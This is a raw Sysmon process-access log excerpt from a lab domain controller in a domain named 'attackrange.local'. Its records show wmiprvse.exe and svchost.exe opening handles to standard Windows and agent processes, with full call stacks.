21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEC-60D3-3C00-00000000CF01}3460C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025885Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025884Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025883Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025882Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEC-60D3-3800-00000000CF01}3364C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025881Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025880Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025879Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025878Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025877Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEC-60D3-3500-00000000CF01}3296C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025876Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025875Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEB-60D3-3300-00000000CF01}3092C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025874Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025873Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025872Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025871Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEA-60D3-3100-00000000CF01}2308C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025870Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025869Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025868Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEA-60D3-2F00-00000000CF01}2288C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025867Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025866Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025865Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.707{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DEA-60D3-2C00-00000000CF01}2184C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025864Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 